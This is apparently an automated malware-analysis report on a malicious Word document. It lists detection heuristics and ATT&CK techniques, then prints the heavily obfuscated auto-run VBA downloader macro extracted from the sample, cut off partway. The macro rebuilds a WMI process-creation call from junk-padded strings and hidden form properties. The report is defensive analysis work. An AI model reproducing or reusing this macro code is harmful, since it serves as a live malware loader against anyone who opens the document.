Verdict: MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER' indicates the macros are designed to execute commands, likely to download and run a secondary payload. The ClamAV detection 'Doc.Downloader.Generic-9395776-0' further supports its downloader functionality. The presence of VBA macros and the likely execution of a command stager points to a spearphishing attachment delivery method.
Heuristics (7)
- ClamAV: Doc.Downloader.Generic-9395776-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Generic-9395776-0
- VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical) OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER: VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 9593eb67380f2c19deb8a545c825465b12161564a29643ebccad52b069ec68c3) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15342 bytes |
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Hsfggtlltgbdtcse0"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Qyiismxqrt_8hu7u.Ig_c9zmsgmz7b
End Sub
Attribute VB_Name = "Qyiismxqrt_8hu7u"
Attribute VB_Base = "0{421A0AB0-DB6C-4B73-89D9-C1D10B7CACAD}{CB61A236-DD34-46C2-BC8F-3B7A2BEF1884}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Ig_c9zmsgmz7b()
Xkm0dzym9j2psc7 = "837"
If Len("Hl2pawm2rpykc2Aykvzqvd34bp23m") = Len("Oabunyqvl0wrzankg1") + 1 Then End
If Len("Tishb1i_w0hw_fteBggni1k16ep2pGabvyb5_5fy5wdnwl") < Len("Xeiaunttirhw") Then
MsgBox "Ghg0v0u7cqcmazodg" + "F4j6luirybe5m"
MsgBox ("Fmpwpf3y3k5yfytye")
MsgBox "Bd05vn7x1ekt2j" + "Hezk4zawvb0"
End If
If Len("Qov9_813j5oB14pyniuuv7t6om2b") = Len("K4wmjifglwbr6q") Then
MsgBox "Xic7w9h4prcsbdvv" + "T2pwf1rukscxsc1q49"
MsgBox ("H6quhah6g1dd !!!")
MsgBox "Bc2dae3svllqfg8p" + "Bifpkelhiw97k"
End If
F1b6qp2c2bayo6_vqj = Qyiismxqrt_8hu7u.HelpContextId + 50 + 50
Mb5s71xgmcob0 = "635"
If Len("Gj6nfam0vgnVw2hg6l6v320") = Len("Zanxyhuib0s3") + 1 Then End
If Len("Hf_sryex8bqWu2eqrs8gf_0X05a3yiqduf7d") < Len("B5uc_9r4y5evr") Then
MsgBox "W9fgaguzlxf" + "F14_vingqcwcab"
MsgBox ("Dla7ggiugo_782ns8")
MsgBox "P13ayi8iku4lcf0mpo" + "T0h_fwwwnqpcu"
End If
If Len("Domcey3_07y36l58I_hf0p1xobxt37s") = Len("P92wjl1t3all") Then
MsgBox "Tk3q7dcnug_wq1" + "Dqgaftjocllajyo"
MsgBox ("Cpix26d83q6c23a5vd !!!")
MsgBox "I6kg6s8zfud41f" + "Whhd6knkj1zg"
End If
Wmtvod4sgoqd = ChrW(F1b6qp2c2bayo6_vqj + (15))
Cukfps788fds44i = "51"
If Len("O4ej__y5m554ui_vxJwbf9lh31laykg") = Len("Dqljzwd7q4wzcnz") + 1 Then End
If Len("N7mpw3p64chjVzuxio3zl06j2Imxfpbfs4920obr") < Len("Qo6txecb509rh8") Then
MsgBox "E7gdtg94ihl7w8" + "A2i6mqoh0hjvl"
MsgBox ("Czl7qudi90kzwx")
MsgBox "Iiqfv9hjmub4y" + "Xjvxmesaagmg"
End If
If Len("Ukvy636x05q1s8q_mUpabzzcjs6lik5") = Len("Do_28ha5u9qf86") Then
MsgBox "Bbz4u332v7vv" + "Am2txmnsqipg3"
MsgBox ("Lejugpk3kurjxny !!!")
MsgBox "Wlw24ig8sur1w4" + "P3glwlmpg_jbg"
End If
Ijztlwkgzqfn5h = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Wmtvod4sgoqd + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Qyiismxqrt_8hu7u.Vsr9ja_v24yn5 + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
G9506ifjjb0s83q2wc = "914"
If Len("V2d0nfjdgnrxRjvuawu87sd") = Len("Sqna5yrr1mf") + 1 Then End
If Len("Zr4we084p55yW1_tj0i_9xz7Jz_fomepwu4") < Len("U8vlw7w1509r0rn8gb") Then
MsgBox "C1bwh4kprt3kgguqb" + "Rm2dgjp3th9_hiu2"
MsgBox ("G3lotmregbz3loam")
MsgBox "N1cat3gpkdssm" + "Spsly2jgak0ah2_"
End If
If Len("U9y016zz1ae0G_w6s0m5cmva") = Len("S3btuqqcku6o5") Then
MsgBox "T4wywk93lmg13xp1v" + "Yof8xhqytg0"
MsgBox ("Tryewary_2o9qz !!!")
MsgBox "Vz4yv_4qqz6gp" + "Y2358v1cxboj"
End If
Fzu7ik4kxno = Ww4o01pe1d0b9z8zl(Ijztlwkgzqfn5h)
Erbhmd84g60ajbn = "966"
If Len("T30nus5d_ozctY5qyfwybdosqo3_a_o") = Len("I9cj9azx9i0") + 1 Then End
If Len("Vki8fuw83w1yv6Cce0pl0hb6uQq014f_zgg65qn") < Len("I1hoz
... (truncated)